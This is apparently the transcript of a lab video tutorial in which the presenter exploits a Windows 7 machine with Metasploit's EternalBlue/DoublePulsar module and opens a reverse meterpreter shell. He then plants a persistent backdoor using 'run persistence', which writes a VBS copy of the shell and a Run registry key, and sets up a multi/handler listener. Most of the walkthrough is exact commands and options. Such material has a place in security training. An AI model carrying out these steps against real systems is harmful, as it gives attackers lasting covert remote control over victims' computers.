Hello everybody and welcome back. Now let us start off by actually running the persistence on our target machine. So I'm starting up Windows 7 right here. Let's start Windows normally, since I had a problem running it a few seconds ago. And right now what we will try is to actually run our persistence backdoor on the target system, which would allow us to connect to it anytime we want. So, basically, if you have noticed, once we get the meterpreter shell and we reboot the machine, we will not be able to connect back to the target. So the target could actually prevent us from exploiting their computer, or from gathering some information after we get the shell open, by just shutting down the PC, if we didn't run the persistence. So the persistence is something that you want to run at the very beginning of exploitation. Right after you get the meterpreter shell, that is most likely the first thing you want to do. So let us see how we can do that.

So I opened up my Windows 7 machine; it is working normally. Let us just check out its IP address once again. It should be .1.5, I believe... ipconfig, and it really is .1.5. So right now let us go to our Kali Linux machine. Right here we have Metasploit open, and what we want to do, basically, is perform the previous exploit real fast. So we want to use exploit/windows/eternalblue_doublepulsar, show options. We want to set RHOSTS to 192.168.1.5. Set TARGETARCHITECTURE to x64, since Windows 7 is 64 bit. Set PROCESSINJECT to this file, which we paste right here. We set payload to be windows/x64/meterpreter/reverse_tcp, and set LHOST at the end to be 192.168.1.4. Pardon me, RHOSTS should be the IP address of the Windows 7 machine, so let's change that. So set RHOSTS to 192.168.1.5, which is the IP address of our Windows 7 machine. So show options, and right now we should be good to go. So just run exploit here, and we should get a meterpreter shell with system privileges on the target system. After we do that we will load a module called persistence, and we will actually try to get the meterpreter shell back even after we reboot the Windows 7 machine. But before we do that, we need to wait for our session to open. So, I hope it will do it real fast. Let's see... launching eternal blue, we specified everything correctly, timed out waiting to SelectionNotify event. What do you mean by that? But we did get the shell back, so it doesn't really matter. getuid, and we are system. So I'm not really sure what this error right here is, but we were able to get system. So print working directory, and we can see that we are in C:\windows\system32. Good!

Now that we have actually exploited it, let's run the persistence. So, we run it with this command. Run persistence -h to see our available options. Usage: run Executes a Ruby script or Metasploit Post Module in the context of the meterpreter session. Okay, so it doesn't give us the module options, but it doesn't matter. I will just type the command here and I will explain to you what it all means. So, let us run the command. What you want to do is run persistence -u, which basically stands for automatically start the program, or our reverse shell, when the user logs on. Now you can also use -X, so when the system boots you can use that. So -X is automatically start the agent when the system boots, and -u is automatically start the agent when the user logs in. We will use -u in this case. Now we will use -i for the interval between each connection attempt. So, for example, let's say we weren't able to actually set up our listener at the correct time when the system was booted, and we missed the first connection try. So we want to set this to try to connect to us every, for example, 10 seconds, so let's type 10 seconds here, so we can actually connect anytime we want while the system is running. The thing that we want to specify after that is -p for the port, and let's use port 443. And of course after that you want to use -r, which is the remote address; basically, this is our IP address. So, this is the IP address that the target machine will try to connect to, which should be the IP address of your Kali Linux machine, which in my case is .1.4. After you do that you just hit enter here, run persistence, and we specify the entire command right here, and it will run the persistence for us, and it will create a registry key in the registry key folder.

So we can see it right here; let's actually analyze this a little bit. What this did is basically persist the script written to this path right here. So in temp we got the .vbs script with a weird name, and this .vbs script is basically just a copy of the meterpreter shell in the temporary folder. And it also created a registry key in the current user registry, in the run startup folder, and it named it like this. So basically what this registry key does is at every boot up it will run this program, which is our meterpreter shell. It will also try to connect every 10 seconds. So now that we actually ran the persistence, let's actually reboot the machine and see if it works. Now, while you reboot the machine you need to actually set up the listener. Since our eternal blue double pulsar isn't really a listener, we need to set up the regular exploit multi handler, our regular listener. So let's reboot the machine, and we can check that the machine really is shutting down, so it is rebooting or restarting. And while we do that, we want to exit this, and we want to use exploit/multi/handler. Set payload to be the same payload we specified in the exploit, so windows/x64/meterpreter/reverse_tcp. Set LHOST to be 192.168.1.4 and set LPORT to be 443, since LPORT 443 is something that we specified in our persistence command. And now we type exploit, and we are waiting for incoming connections. It should prompt us with a meterpreter shell as soon as this Windows 7 machine boots up. So let's wait for it to connect to the internet... and in just a few seconds we should be getting the meterpreter session opened. We still didn't get it, no idea why, but it should come soon. No idea why we didn't get it. We should have got it.

So we can check the registry in this Windows 7. Let's go to Run, and then let's open regedit right here in order for us to open the registry folder. Let's go to the registry where we saved our file. So, current user, software, Microsoft. Then we go to the windows, I believe. Okay, so windows, currentversion, and then run. Value not set, so we were not even able to set the value for it. Now why didn't it set? I have no idea. Let us try it once again. So let's close this, and let's actually use the same thing as before, which is use exploit multi handler double pulsar, show options. So, we should already have our presets, and let's exploit this. And let's see if I run the same command in the meterpreter, will we get the registry key right here? Let's actually check in the CMD, so change AppData. Let's just wait for this to open. It should have written us a registry key, not really sure why it didn't, but we will try to fix that right now. So we got a meterpreter session open with eternal blue double pulsar, and what we want to do is actually run the same command as before. Run persistence as user logs in. Let's actually type as system boots, 10 seconds, remote address to be this one. And hopefully right now if we refresh this... so it created it at local machine. So now it is created at local machine. Let's see if it is there. It should be named like this, so this random letter. So let's go to the local machine, to the software, to the Microsoft, to the Windows. It's basically the same path, you just find where Windows is. Okay, so windows currentversion, and then the run folder. And let's see if it is there, and here it is. So right now this did work.

So let me just see right now if we reboot the PC, exit the session, and set up our handler once again, so multi handler, show options, and we exploit since everything is already set, so the IP address is set, the port is set, and we run this. Now the problem could be that it puts this in the temp directory, which I think we can change, but basically this is the idea of the persistence. We can actually specify the directory as well if we want to, so we do not need to put it into the temporary directory. I'm not really sure if the temp directory actually deletes all the files at the reboot. So let's see if we open up Run once again, so run, and then regedit. We go right there, we want to open that, we go to the local machine, software, Microsoft, to the Windows I believe, it should be Windows. Okay, so it is all the way down. Windows, currentversion, and then the run right here. And we still have it right there. So I'm not really sure why this doesn't work, why it won't open the file, but basically this is the simple idea behind this. Now I tried this yesterday on Windows 10 and it does work, so maybe it's some problem with Windows 7. It doesn't even matter. Now the point is that this is the process of actually making persistence. So you should actually be able to use this on Windows 10, for example; I'm not really sure why it doesn't work here. I will actually check it out and maybe tell you in the next video what the problem was, if there was any problem.

And that would be about it for this tutorial. I hope I see you in the next one, and take care. Bye!